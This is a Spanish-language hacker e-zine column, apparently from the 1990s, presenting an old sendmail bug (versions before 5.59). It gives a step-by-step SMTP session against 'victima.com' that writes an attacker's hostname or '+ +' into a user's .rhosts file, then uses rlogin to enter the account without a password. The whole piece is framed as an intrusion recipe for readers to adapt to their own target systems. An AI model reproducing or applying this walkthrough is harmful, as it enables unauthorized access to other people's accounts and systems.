IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII o 04. EL BUG DEL MES o IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII Saludos amigos, aqui esta para serviros y para comentaros el bug de este mes el Dark Raver. Como no os sonara mi nombre, os dire que soy un fanatico de los ordenatas y por supuesto del hacking, que me podreis encontrar en Axis y que es la primera vez que escribo en esta super publicacion, y no es por peloteo :-) Me han dejado libertad, para elegir el bug de este mes, pero me han dicho que no me porte mal }:-) Es una pena, pero habra que aguantarse. Por eso he decidido continuar con lo que hizo Red en el numero anterior y os voy a explicar otro bug clasico del sendmail. Este bug es un poco mas moderno, que el que explico Red, y a lo mejor todavia funciona en algun sitio, pero no os hagais ilusiones. Sistemas: Unix's en general Versiones: Sendmail, versiones anteriores a la 5.59 Descripcion: Bug del sendmail Con este bug, los usuarios externos pueden sobre-escribir cualquier archivo, que no tenga nivel de root. Ejemplo: (No voy a poner ejemplos de sistemas operativos concretos. Intentare esplicarme lo mas generalmente posible, y luego vosotros tendreis que aplicarlo a vustro sistema en concreto.) Hacemos un telnet a victima.com al puerto 25 rcpt to: /home/pepe/.rhosts --> Nombre (y situacion) del fichero a escribir. En este caso vamos a sobre-escribir el rhosts del usuario llamado pepe. mail from: pepe data "Aqui pon lo que quieras, un comentario para el root por ejemplo :-)" . --> Normalmente te dara un mensaje de error, despues de poner el punto. rcpt to: /home/pepe/.rhosts --> Esto es muy importante, hay que hacerlo 2 veces. mail from: pepe data --> Ahora en este segundo intento si que podras escribir en el fichero. mi.ordenador.com --> Esto es lo que se escribira en el archivo. Tambien se podria poner ' + + ' o algo similar. . --> Si no da mensaje de error es que ha funcionado. quit Despues hacemos un rlogin a victima.com como si fuesemos pepe, y como el nombre de nuestro ordenador, aparece en su .rhosts (remote hosts) entraremos sin problemas, ya que no nos pedira el pass. Para comprender este texto, es necesario, tener un nivel medio en el manejo de sistemas unix. Si no has comprendido algo, mirate un manual sobre unix, o instalate el linux en tu pc y practica un poco. Seguro que si lo haces este fichero te parecera cosa de ni€os. Dark Raver